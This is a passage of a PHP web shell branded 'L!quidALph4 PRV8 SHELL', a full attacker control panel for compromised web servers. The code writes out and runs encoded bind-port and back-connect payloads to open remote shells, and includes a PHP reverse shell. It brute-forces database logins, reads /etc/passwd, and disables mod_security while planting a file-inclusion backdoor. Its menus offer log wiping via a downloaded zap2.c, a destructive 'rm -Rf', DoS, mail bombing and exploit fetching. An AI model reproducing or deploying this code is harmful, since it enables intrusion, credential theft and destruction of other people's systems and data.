7320$bind_port_p="bZFvS8NADMZft9DvkNUxW6hsw5f+wbJVHc5WelUQldK1mTucd6W94cTtu3tpN1DxXS753ZMnyUGnv6qr/oyLfonV0jK77DqYTs/sJlUv4IjbJ5bJ5+Bc+PHVA5zC0IUvwDVXztA9ga1lrmoEJvM3VJqsm8BhXu/uMp2EQeL1WDS6SVkSB/6t94qqrKSSs0+RvaNzqPLy0HVhs4GCI9ijTCjIK8wUQqv0LKh/jYqesiRlFk1T0tTaLErj4J4F/ngce9qOZWrbhWaIzoqiSrlwumT8afDiTULiUj98/NtSliiglNWu3ZLXCoWWOf7DtYUf5MeCL9GhlVimkeU5aoejKAw9RmYMPnc6TrfkxdlcVm9uixl7PSEVUN4G2m+nwDkXWADxzW+jscWS8ST07NMe6dq/8tF94tnn/xSCOP5dwDXm0N52P1FZcT0RIbvhiFnpxbdYO59h5Eup70vYTogrGFCoL7/9Bg==";
7321
7322echo $shellstyle;
7323?>
7324<table style="width:100%;">
7325<tr align="right">
7326<td><a href="<?php echo $self;?>"><font size="6" style="text-decoration:none;" face="Times New Roman, Times, serif">DH4NI VUPP4LA PRV8 SHELL</font></a>
7327</td><td align="right">
7328<form method="get">
7329<select id="style" class="sbox" onChange="change_style(this.value)">
7330<option selected="selected">--Style--</option>
7331<option value="dhanush">Dh4ni</option>
7332<option value="404">404</option>
7333<option value="phizo">Phizo</option>
7334<option value="orange">orange</option>
7335</select>
7336</form></td>
7337</tr></table>
7338<hr color="#1B1B1B">
7339
7340<table cellpadding="0" style="width:100%;">
7341 <tr>
7342 <td colspan="2" style="width:75%;">System Info : <font class="txt"><?php systeminfo(); ?></font></td>
7343 <td style="width:10%;">Server Port : <font class="txt"><?php serverport(); ?></font></td>
7344 <td style="width:15%;"><a href=# onClick="maindata('com')"><font class="txt"><i>Software Info</i></font></a></td>
7345 </tr>
7346 <?php if($os != 'Windows' || shell_exec("id") != null) { ?><tr>
7347 <td style="width:75%;" colspan="2">Uid : <font class="txt"><?php echo shell_exec("id"); ?></font></td>
7348 <?php $d0mains = @file("/etc/named.conf");
7349 $users=@file('/etc/passwd');
7350 if($d0mains)
7351 {
7352 $count;
7353 foreach($d0mains as $d0main)
7354 {
7355 if(@ereg("zone",$d0main))
7356 {
7357 preg_match_all('#zone "(.*)"#', $d0main, $domains);
7358 flush();
7359 if(strlen(trim($domains[1][0])) > 2)
7360 {
7361 flush();
7362 $count++;
7363 }
7364 }
7365 }
7366 ?><td colspan=2 style="width:75%;">Websites : <font class="txt"><?php echo "$count Domains"; ?></font></td><?php
7367 }
7368 else if($users)
7369 {
7370 $file = fopen("/etc/passwd", "r");
7371 while(!feof($file))
7372 {
7373 $s = fgets($file);
7374 $matches = array();
7375 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
7376 $matches = str_replace("home/","",$matches[1]);
7377 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
7378 continue;
7379 $count++;
7380 }
7381 ?><td colspan=2 style="width:75%;">Websites : <font class="txt"><?php echo "$count Domains"; ?></font></td><?php } ?>
7382 </tr><?php } ?>
7383 <tr>
7384 <td style="width:20%;">Disk Space : <font class="txt"><?php echo HumanReadableFilesize(diskSpace()); ?></font></td>
7385 <td style="width:20%;">Free Space : <font class="txt"><?php echo HumanReadableFilesize(freeSpace()); $dksp = diskSpace(); $frsp = freeSpace(); echo " (".(int)($frsp/$dksp*100)."%)"; ?></font></td>
7386
7387 <td style="width:20%;">Server IP : <font class="txt"><a href="http://whois.domaintools.com/<?php serverip(); ?>"><?php serverip(); ?></a></font></td>
7388 <td style="width:15%;">Your IP : <font class="txt"><a href="http://whois.domaintools.com/<?php yourip(); ?>"><?php yourip(); ?></a></font></td>
7389 </tr>
7390
7391 <tr>
7392 <?php if($os == 'Windows'){ ?><td style="width:15%;vertical-align:text-top;">View Directories : <font class="txt"><?php echo showDrives();?></font></td><?php } ?>
7393 <td style="width:30%;vertical-align:text-top;">Current Directory : <span id="crdir"><font color="#009900">
7394 <?php
7395 $d = str_replace("\\",$directorysperator,$dir);
7396 if (substr($d,-1) != $directorysperator) {$d .= $directorysperator;}
7397 $d = str_replace("\\\\","\\",$d);
7398 $dispd = htmlspecialchars($d);
7399 $pd = $e = explode($directorysperator,substr($d,0,-1));
7400 $i = 0;
7401 foreach($pd as $b)
7402 {
7403 $t = '';
7404 $j = 0;
7405 foreach ($e as $r)
7406 {
7407 $t.= $r.$directorysperator;
7408 if ($j == $i) {break;}
7409 $j++;
7410 }
7411$href=addslashes($t);
7412
7413 echo "<a href=javascript:void(0) onClick=\"changedir('dir','$href')\"><b><font class=\"txt\">".htmlspecialchars($b).$directorysperator.'</font></b></a>';
7414 $i++;
7415 }
7416
7417 ?>
7418 </font></span> <a href=# onClick="gethome('home','<?php echo addslashes(getcwd()); ?>')">[Home]</a></td>
7419 <td style="width:20%;max-width:200px;word-break:break-all;">Disable functions : <font class="txt"><?php echo getDisabledFunctions(); ?> </font></td>
7420 <td style="vertical-align:text-top;">Safe Mode : <font class=txt><?php echo safe(); ?></font></td>
7421 <?php if($os == "Linux") { ?><td style="vertical-align:text-top;"><a href="<?php echo $self.'?downloadit'?>">Download It</a><?php } ?></td>
7422 </tr>
7423 </table>
7424
7425<?php $m1 = array('Symlink'=>'symlinkserver','Forum'=>'forum','Sec. Info'=>'secinfo','Code Inject'=>'injector','Bypassers'=>'bypass','Server Fuzzer'=>'fuzz','Zone-h'=>'zone','DoS'=>'dos','Mail'=>'mailbomb','Tools'=>'tools','PHP'=>'phpc','Exploit'=>'exploit','Connect'=>'connect');
7426 $m2 = array('SQL'=>'database','Sub-Domain Creator'=>'subdomain','404 Page'=>'404','Malware Attack'=>'malattack','Cpanel Cracker'=>'cpanel','About'=>'about');
7427 echo "<table border=3 style=border-color:#333333; width=100%; cellpadding=2>
7428 <tr>";
7429 $menu = '';
7430
7431 foreach($m1 as $k => $v)
7432 $menu .= "<td style=\"border:none;\"><a href=# onClick=\"maindata('".$v."')\"><font class=\"mainmenu\">[".$k."]</font></a></td>";
7433 echo $menu;
7434 echo "</tr>
7435</table>
7436<center>
7437<table style=\"border-color:#333333;\" border=2 width=70%; cellpadding=2>
7438 <tr align=center>";
7439 foreach($m2 as $k => $v)
7440 $menu1 .= "<td style=\"border:none;\"><a href=# onClick=\"maindata('".$v."','".addslashes($_GET['dir'])."')\"><font class=\"mainmenu\">[".$k."]</font></a></td>";
7441 echo $menu1;
7442 echo "<td style=\"border:none;\"><a href=javascript:void(0) onClick=\"if(confirm('WANNA GO TO HELL ??')){getmydata('selfkill');}else{return false;}\"><font class=mainmenu>[Sucide]</font></a></td>
7443 <td style=\"border:none;\"><a href=\"$self?logout\"><font class=mainmenu>[LogOut]</font></a></td>
7444 </tr>
7445</table></center>";?>
7446
7447<div id="showmaindata"></div>
7448<center><div id="showmydata"></div></center>
7449<?php
7450
7451if(isset($_GET["downloadit"]))
7452{
7453 $FolderToCompress = getcwd();
7454 execmd("tar --create --recursion --file=backup.tar $FolderToCompress");
7455
7456 $prd=explode("/","backup.tar");
7457 for($i=0;$i<sizeof($prd);$i++)
7458 {
7459 $nfd=$prd[$i];
7460 }
7461 @ob_clean();
7462 header("Content-type: application/octet-stream");
7463 header("Content-length: ".filesize($nfd));
7464 header("Content-disposition: attachment; filename=\"".$nfd."\";");
7465 readfile($nfd);
7466 exit;
7467}
7468//Turn Safe Mode Off
7469if(getDisabledFunctions() != "None" || safe() != "OFF")
7470{
7471 $file_pointer = fopen(".htaccess", "w+");
7472 fwrite($file_pointer, "<IfModule mod_security.c>
7473 SecFilterEngine Off
7474 SecFilterScanPOST Off
7475 </IfModule> \n\r");
7476
7477 $file_pointer = fopen("ini.php", "w+");
7478 fwrite($file_pointer, "<?
7479echo ini_get(\"safe_mode\");
7480echo ini_get(\"open_basedir\");
7481include(\$_GET[\"file\"]);
7482ini_restore(\"safe_mode\");
7483ini_restore(\"open_basedir\");
7484echo ini_get(\"safe_mode\");
7485echo ini_get(\"open_basedir\");
7486include(\$_GET[\"ss\"]);
7487?>");
7488
7489 $file_pointer = fopen("php.ini", "w+");
7490 fwrite($file_pointer, "safe_mode = Off");
7491
7492 fclose($file_pointer);
7493
7494 }
7495
7496if(isset($_POST['cpanelattack']))
7497{
7498 if(!empty($_POST['username']) && !empty($_POST['password']))
7499 {
7500 $userlist=explode("\n",$_POST['username']);
7501 $passlist=explode("\n",$_POST['password']);
7502
7503 $e = explode("\n",$_POST['username']);
7504 foreach($e as $value)
7505 {
7506 $k = explode(":",$value);
7507 $username .= $k['0']." ";
7508 }
7509
7510 $a1 = explode(" ",$username);
7511 $a2 = explode("\n",$_POST['password']);
7512 $id2 = count($a2);
7513 $ok = 0;
7514 foreach($a1 as $user)
7515 {
7516 if($user !== '')
7517 {
7518 $user=trim($user);
7519 for($i=0;$i<=$id2;$i++)
7520 {
7521 $pass = trim($a2[$i]);
7522 if(@mysql_connect('localhost',$user,$pass))
7523 {
7524 echo "User is (<b>$user</b>) Password is (<b><font class='txt'>$pass</font></b>)<br />";
7525 $ok++;
7526 }
7527 }
7528 }
7529 }
7530 echo "<hr><b>You Found <font color=red>$ok</font></b>";
7531 }
7532 else
7533 $bdmessage = "<center>Enter Username & Password List<center>";
7534}
7535elseif(isset($_GET['style']))
7536{
7537 setcookie('style',$_GET['style']);
7538 header("location:$self");
7539}
7540else if(isset($_GET['info']))
7541{
7542 $bdmessage = "<br><div align=left><font class=txt>".nl2br(shell_exec("whois ".$_GET['info']))."</font></div>";
7543}
7544else if(isset($_POST['u']))
7545{
7546 $path = $_REQUEST['path'];
7547 if(is_dir($path))
7548 {
7549 $setuploadvalue = 0;
7550 $uploadedFilePath = $_FILES['uploadfile']['name'];
7551 $tempName = $_FILES['uploadfile']['tmp_name'];
7552 if($os == "Windows")
7553 $uploadPath = $path . $directorysperator . $uploadedFilePath;
7554 else if($os == "Linux")
7555 $uploadPath = $path . $directorysperator . $uploadedFilePath;
7556 if($stat = move_uploaded_file($_FILES['uploadfile']['tmp_name'] , $uploadPath))
7557 $bdmessage = "<font class=txt size=3><blink>File uploaded to $uploadPath</blink></font>";
7558 else
7559 $bdmessage = "<font size=3><blink>Failed to upload file to $uploadPath</blink></font>";
7560 }
7561 ?><script type="text/javascript">changedir('dir','<?php echo addslashes($path); ?>'); </script><?php
7562}
7563else if(isset($_POST['backdoor']))
7564{
7565 if(isset($_POST['passwd']) && isset($_POST['port']) && isset($_POST['lang']))
7566 { ?><script type="text/javascript">gethome('connect');</script><?php
7567 $passwd = $_POST['passwd'];
7568
7569 if($_POST['lang'] == 'c')
7570 {
7571 if(is_writable("."))
7572 {
7573 @$fh=fopen(getcwd()."/backp.c",'w');
7574 @fwrite($fh,gzinflate(base64_decode($bind_port_c)));
7575 @fclose($fh);
7576 execmd("chmod 0755 ".getcwd()."/backp.c");
7577 execmd("gcc -o ".getcwd()."/backp ".getcwd()."/backp.c");
7578 execmd("chmod 0755 ".getcwd()."/backp");
7579 execmd(getcwd()."/backp"." ".$_POST['port']." ". $passwd ." &");
7580 $scan = exec_all("ps aux | grep backp".$_POST['port']);
7581 if(eregi("backp".$_POST['port'],$scan))
7582 $bdmessage = "Process found running, backdoor setup successfully.";
7583 else
7584 $bdmessage = "Process not found running, backdoor not setup successfully.";
7585 }
7586 else
7587 {
7588 @$fh=fopen("/tmp/backp.c","w");
7589 @fwrite($fh,gzinflate(base64_decode($bind_port_c)));
7590 @fclose($fh);
7591 execmd("chmod 0755 /tmp/backp.c");
7592 execmd("gcc -o /tmp/backp /tmp/backp.c");
7593 $out = execmd("/tmp/backp"." ".$_POST['port']." ". $passwd ." &");
7594 $scan = exec_all("ps aux | grep backp".$_POST['port']);
7595 if(eregi("backp".$_POST['port'],$scan))
7596 $bdmessage = "Process found running, backdoor setup successfully.";
7597 else
7598 $bdmessage = "Process not found running, backdoor not setup successfully.";
7599 }
7600 }
7601 if($_POST['lang'] == 'perl')
7602 {
7603 if(is_writable("."))
7604 {
7605 @$fh=fopen(getcwd()."/bp.pl",'w');
7606 @fwrite($fh,gzinflate(base64_decode($bind_port_p)));
7607 @fclose($fh);
7608 execmd("chmod 0755 ".getcwd()."/bp.pl");
7609 execmd("perl ".getcwd()."/bp.pl ".$_POST['port']." ". $passwd ." &");
7610
7611 $bdmessage = "<pre>$out\n".execmd("ps aux | grep bp.pl")."</pre>";
7612 }
7613 else
7614 {
7615 @$fh=fopen("/tmp/bp.pl","w");
7616 @fwrite($fh,gzinflate(base64_decode($bind_port_p)));
7617 @fclose($fh);
7618 execmd("chmod 0755 ".getcwd()."/bp.pl");
7619 execmd("perl ".getcwd()."/bp.pl ".$_POST['port']." ". $passwd ." &");
7620 $bdmessage = "<pre>$out\n".execmd("ps aux | grep bp.pl")."</pre>";
7621 }
7622 }
7623 }
7624}
7625else if(isset($_POST['backconnect']))
7626{
7627 if($_POST['ip'] != "" && $_POST['port'] != "")
7628 { ?><script type="text/javascript">gethome('connect');</script><?php
7629 $host = $_POST['ip'];
7630 $port = $_POST['port'];
7631 if($_POST["lang"] == "perl")
7632 {
7633 if(is_writable("."))
7634 {
7635 @$fh=fopen(getcwd()."/bc.pl",'w');
7636 @fwrite($fh,gzuncompress(base64_decode($backconnect_perl)));
7637 @fclose($fh);
7638 $bdmessage = "<font color='#FFFFFF'>Trying to connect...</font>";
7639 execmd("perl ".getcwd()."/bc.pl $host $port &",$disable);
7640 if(!@unlink(getcwd()."/bc.pl")) echo "<font color='#FFFFFF' size=3>Warning: Failed to delete reverse-connection program</font></br>";
7641 }
7642 else
7643 {
7644 @$fh=fopen("/tmp/bc.pl","w");
7645 @fwrite($fh,gzuncompress(base64_decode($backconnect_perl)));
7646 @fclose($fh);
7647 $bdmessage = "<font color='#FFFFFF'>Trying to connect...</font>";
7648 execmd("perl /tmp/bc.pl $host $port &",$disable);
7649 if(!@unlink("/tmp/bc.pl"))
7650 echo "<h2>Warning: Failed to delete reverse-connection program</h2></br>";
7651 }
7652 }
7653 else if($_POST["lang"] == "python")
7654 {
7655 if(is_writable("."))
7656 {
7657 $w_file=@fopen(getcwd()."/bc.py","w") or die(mysql_error());
7658 if($w_file)
7659 {
7660 @fputs($w_file,gzuncompress(base64_decode($back_connect_p)));
7661 @fclose($w_file);
7662 chmod(getcwd().'/bc.py', 0777);
7663 }
7664 execmd("python ".getcwd()."/bc.py $host $port &",$disable);
7665 $bdmessage = "<font color='#FFFFFF'>Trying to connect...</font>";
7666
7667 if(!@unlink(getcwd()."/bc.py"))
7668 echo "<h2>Warning: Failed to delete reverse-connection program</h2></br>";
7669 }
7670 else
7671 {
7672 $w_file=@fopen("/tmp/bc.py","w");
7673 if($w_file)
7674 {
7675 @fputs($w_file,gzuncompress(base64_decode($back_connect_p)));
7676 @fclose($w_file);
7677 chmod('/tmp/bc.py', 0777);
7678 }
7679 execmd("python /tmp/bc.py $host $port &",$disable);
7680 $bdmessage = "<font color='#FFFFFF'>Trying to connect...</font>";
7681 if(!@unlink("/tmp/bc.py"))
7682 echo "<h2>Warning: Failed to delete reverse-connection program</h2><br>";
7683 }
7684 }
7685 else if($_POST["lang"] == "php")
7686 {
7687 $bdmessage = "<font color='#FFFFFF'>Trying to connect...</font>";
7688 $ip = $_POST['ip'];
7689 $port=$_POST['port'];
7690 $sockfd=fsockopen($ip , $port , $errno, $errstr );
7691 if($errno != 0)
7692 {
7693 $bdmessage = "<b>$errno</b> : $errstr";
7694 }
7695 else if (!$sockfd)
7696 {
7697 $result = "<p>Fatal : An unexpected error was occured when trying to connect!</p>";
7698 }
7699 else
7700 {
7701 fputs ($sockfd ,"\n=================================================================\nCODED BY TH3-D357ROY3R & POI50N OP3R47OR\n=================================================================");
7702 $pwd = exec_all("pwd");
7703 $sysinfo = exec_all("uname -a");
7704 $id = exec_all("id");
7705 $len = 1337;
7706 fputs($sockfd ,$sysinfo . "\n" );
7707 fputs($sockfd ,$pwd . "\n" );
7708 fputs($sockfd ,$id ."\n\n" );
7709 fputs($sockfd ,$dateAndTime."\n\n" );
7710 while(!feof($sockfd))
7711 {
7712 $cmdPrompt ="(dhanush)[$]> ";
7713 fputs ($sockfd , $cmdPrompt );
7714 $command= fgets($sockfd, $len);
7715 fputs($sockfd , "\n" . exec_all($command) . "\n\n");
7716 }
7717 fclose($sockfd);
7718 }
7719 }
7720 }
7721}
7722else if (isset ($_GET['val1'], $_GET['val2']) && is_numeric($_GET['val1']) && is_numeric($_GET['val2']))
7723{
7724 $temp = "";
7725 for(;$_GET['val1'] <= $_GET['val2'];$_GET['val1']++)
7726 {
7727 $uid = @posix_getpwuid($_GET['val1']);
7728 if ($uid)
7729 $temp .= join(':',$uid)."\n";
7730 }
7731 echo '<br/>';
7732 paramexe('Users', $temp);
7733}
7734else if(isset($_GET['download']))
7735{
7736 download();
7737}
7738else
7739{
7740 ?><script type="text/javascript">gethome('home','<?php echo addslashes($dir); ?>');</script><?php
7741}
7742$is_writable = is_writable($dir)?"<font class=txt>< writable ></font>":"< not writable >";
7743?>
7744</p><center><div id="showdir"><?php echo $bdmessage; ?></div></center>
7745<table class="btmtbl" style="width:100%;" border="1">
7746<tr>
7747<td class="btmtbl" align="center">
7748<form method="post" enctype="multipart/form-data">
7749Upload file : <br><input type="file" name="uploadfile" class="box" size="50">
7750<input type="hidden" id=path name="path" value="<?php echo $dir; ?>" />
7751<input type=submit value="Upload" name="u" value="u" class="but" ></form>
7752<span name="wrtble"><?php
7753echo $is_writable; ?></span>
7754 <br>
7755</td>
7756<td class="btmtbl" align="center" style="height:105px;">Create File :
7757<form onSubmit="createdir('Create',createfile.value);return false;">
7758<input type="text" class="box" value="<?php echo $dir . $directorysperator; ?>" name="createfile" id="createfile">
7759<input type="button" onClick="createdir('Create',createfile.value)" value="Create" class="but">
7760</form><span name="wrtble">
7761<?php echo $is_writable; ?></span>
7762</td>
7763</tr>
7764<tr>
7765<td class="btmtbl" align="center" style="height:105px;">Execute : <form onSubmit="executemyfile('execute','<?php echo addslashes($dir); ?>',execute.value);return false;">
7766<input type="text" class="box" name="execute">
7767<input type="hidden" id="exepath" name="exepath" value="<?php echo $dir; ?>">
7768 <input type="button" onClick="executemyfile('execute',exepath.value,execute.value)" value="Execute" class="but"></form></td>
7769
7770<td class="btmtbl" align="center">Create Directory : <form onSubmit="createdir('createfolder',createfolder.value);return false;">
7771<input type="text" value="<?php echo $dir . $directorysperator; ?>" class="box" name="createfolder" id="createfolder">
7772<input type="button" onClick="createdir('createfolder',createfolder.value)" value="Create" class="but">
7773</form><span name="wrtble"><?php
7774echo $is_writable;
7775?></span></td></tr>
7776<tr>
7777<td class="btmtbl" align="center">Read File<form onSubmit="createdir('readfile',readfile.value);return false;">
7778<input type="text" value="<?php echo $dir . $directorysperator; ?>" class="box" name="readfile" id="readfile">
7779<input type="button" onClick="createdir('readfile',readfile.value)" value="Read" class="but">
7780</form></td>
7781<td class="btmtbl" align="center">Read Directory<form onSubmit="changedir('dir',readdir.value);return false;">
7782<input type="text" value="<?php echo $dir . $directorysperator; ?>" class="box" name="readdir" id="readdir">
7783<input type="button" onClick="changedir('dir',readdir.value)" value=" View " class="but">
7784</form></td></tr>
7785<tr><td class="btmtbl" style="height:105px;" align="center">Get Exploit <form onSubmit="getexploit(wurl.value,path.value,functiontype.value);return false;">
7786<input type="text" name="wurl" class="box" value="http://www.some-code/exploits.c">
7787<input type="button" onClick="getexploit(wurl.value,uppath.value,functiontype.value)" value=" G0 " class="but"><br><br>
7788<input type="hidden" id="uppath" name="uppath" value="<?php echo $dir . $directorysperator; ?>">
7789<select name="functiontype" class="sbox">
7790<option value="wwget">wget</option>
7791<option value="wlynx">lynx</option>
7792<option value="wfread">fread</option>
7793<option value="wfetch">fetch</option>
7794<option value="wlinks">links</option>
7795<option value="wget">GET</option>
7796<option value="wcurl">curl</option>
7797</select>
7798</form><div id="showexp"></div>
7799</td>
7800<td class="btmtbl" align="center">
7801<form>
7802Some Commands<br>
7803<?php if($os != "Windows")
7804{ ?>
7805<SELECT NAME="mycmd" class="box">
7806 <OPTION VALUE="uname -a">Kernel version
7807 <OPTION VALUE="w">Logged in users
7808 <OPTION VALUE="lastlog">Last to connect
7809 <option value='cat /etc/hosts'>IP Addresses
7810 <option value='cat /proc/sys/vm/mmap_min_addr'>Check MMAP
7811 <OPTION VALUE="logeraser">Log Eraser
7812 <OPTION VALUE="find / -perm -2 -ls">Find all writable directories
7813 <OPTION VALUE="find . -perm -2 -ls">Find all writable directories in Current Folder
7814 <OPTION VALUE="find / -type f -name 'config'">find config files
7815 <OPTION VALUE="find . -type f -name \"config\"">find config files in current dir
7816
7817 <OPTION VALUE="cut -d: -f1,2,3 /etc/passwd | grep ::">USER WITHOUT PASSWORD!
7818 <OPTION VALUE="find /etc/ -type f -perm -o+w 2> /dev/null">Write in /etc/?
7819 <?php if(is_dir('/etc/valiases')){ ?><option value="ls -l /etc/valiases">List of Cpanel`s domains(valiases)</option><?php } ?>
7820 <?php if(is_dir('/etc/vdomainaliases')) { ?><option value=\"ls -l /etc/vdomainaliases">List Cpanel`s domains(vdomainaliases)</option><?php } ?>
7821 <OPTION VALUE="which wget curl w3m lynx">Downloaders?
7822 <OPTION VALUE="cat /proc/version /proc/cpuinfo">CPUINFO
7823 <OPTION VALUE="ps aux">Show running proccess
7824 <OPTION VALUE="uptime">Uptime check
7825 <OPTION VALUE="cat /proc/meminfo">Memory check
7826 <OPTION VALUE="netstat -an | grep -i listen">Open ports
7827 <OPTION VALUE="rm -Rf">Format box (DANGEROUS)
7828 <OPTION VALUE="wget www.ussrback.com/UNIX/penetration/log-wipers/zap2.c">WIPELOGS PT1 (If wget installed)
7829 <OPTION VALUE="gcc zap2.c -o zap2">WIPELOGS PT2
7830 <OPTION VALUE="./zap2">WIPELOGS PT3
7831 <OPTION VALUE="cat /var/cpanel/accounting.log">Get cpanel logs
7832 </SELECT>
7833 <?php } else {?>
7834 <SELECT NAME="mycmd" class="box">
7835 <OPTION VALUE="dir /s /w /b *config*.php">Find *config*.php in current directory
7836 <OPTION VALUE="dir /s /w /b index.php">Find index.php in current dir
7837 <OPTION VALUE="systeminfo">System Informations
7838 <OPTION VALUE="net user">User accounts
7839 <OPTION VALUE="netstat -an">Open ports
7840 <OPTION VALUE="getmac">Get Mac Address
7841 <OPTION VALUE="net start">Show running services
7842 <OPTION VALUE="net view">Show computers
7843 <OPTION VALUE="arp -a">ARP Table
7844 <OPTION VALUE="tasklist">Show Process
7845 <OPTION VALUE="ipconfig/all">IP Configuration
7846
7847 </SELECT>
7848 <?php } ?>
7849 <input type="hidden" id="auexepath" name="auexepath" value="<?php echo $dir; ?>">
7850<input type="button" onClick="executemyfile('mycmd',auexepath.value,mycmd.value)" value="Execute" class="but">
7851</form>
7852</td>
7853</tr></table><br>
7854
7855</td>
7856</tr>
7857</table>
7858
7859<?php
7860
7861
7862//logout
7863
7864if(isset($_GET['logout']))
7865{
7866 setcookie("hacked",time() - 60*60);
7867 header("Location:$self");
7868 ob_end_flush();
7869}
7870?>
7871
7872
7873<hr color="#1B1B1B">
7874<div align="center">
7875<font size="5" face="Times New Roman, Times, serif"> L!quidALph4 PRV8 SHELL<br><font size="3" face="Times New Roman, Times, serif"> #BREAK THE SYSTEM WHEN ACCESS DENIED#
7876
7877<?php
7878}
7879}
7880
7881if(isset($_POST['uname']) && isset($_POST['passwd']))
7882{
7883 if( $_POST['uname'] == $user && $_POST['passwd'] == $pass )
7884 {
7885 setcookie("hacked", md5($pass));
7886 $selfenter = $_SERVER["PHP_SELF"];
7887 header("Location:$selfenter");
7888 }
7889}
7890
7891if((!isset($_COOKIE['hacked']) || $_COOKIE['hacked']!=md5($pass)) )
7892{
7893 echo $shellstyle;
7894?>
7895
7896 <center>
7897 <form method="POST">
7898 <div style="background-color:#00000; width:50%; border-radius:7px; margin-top:150px; -moz-border-radius:25px; height:410px; background-image:url(Windows_7_-_Alien_from_outer_space.jpg);">
7899 <table cellpadding="9" cellspacing="4">
7900 <tr>
7901 <center> <h1> <marquee bg color="red"> L!quidALph4 PRV8 SHELL </marquee> </h1> </br> </center>
7902 </tr>
7903 <tr>
7904 <td align="right"><font size="3" color="yellow">USERNAME</font></td>
7905 <td><input type="text" name="uname" style="background-color:#FFFFFF; border-radius:7px; -moz-border-radius:10px; border-color:#000000; width:170px; color:#666666;" value="User Name" onFocus="if (this.value == 'User Name'){this.value=''; this.style.color='black';}" onBlur="if (this.value == '') {this.value='User Name'; this.style.color='#828282';}" AUTOCOMPLETE="OFF"></td>
7906 </tr>
7907 <tr>
7908 <td align="right"><font size="3" color="yellow">PASSWORD</font></td>
7909 <td><input type="password" name="passwd" style="background-color:#FFFFFF; border-radius:7px; -moz-border-radius:10px; border-color:#000000; width:170px; color:#666666;" value="User Name" onFocus="if (this.value == 'User Name'){this.value=''; this.style.color='black';}" onBlur="if (this.value == '') {this.value='User Name'; this.style.color='#828282';}" AUTOCOMPLETE="OFF"></td>
7910 </tr>
7911 <tr>
7912 <td align="center" colspan="2"><input type="submit" class="but" value=" Enter "></td>
7913 </tr>
7914 <tr>
7915 <td align="center" colspan="2"><font size="6" face="Times New Roman, Times, serif"><b><a href="http://facebook.com/734M.H5H">* Macedonia Is Greek * </a></b></font></td>
7916 </tr>
7917 <tr>
7918 <td colspan="2"><font size="4" face="Times New Roman, Times, serif"><noscript>Enable Javascript in your browser for the proper working of the shell</noscript></font></td>
7919 </tr>
7920 </table>
7921 </div>
7922 <embed allowscriptaccess="never" allownetworking="internal" src="http://xdieka-civilx.xp3.biz/swf/xxx.swf" autostart="TRUE" loop="TRUE" align="MIDDLE" height="0" width="0"></embed>
7923 </form>
7924 </center>
7925<br>
7926</body>
7927</html>
7928<?php
7929}
7930?>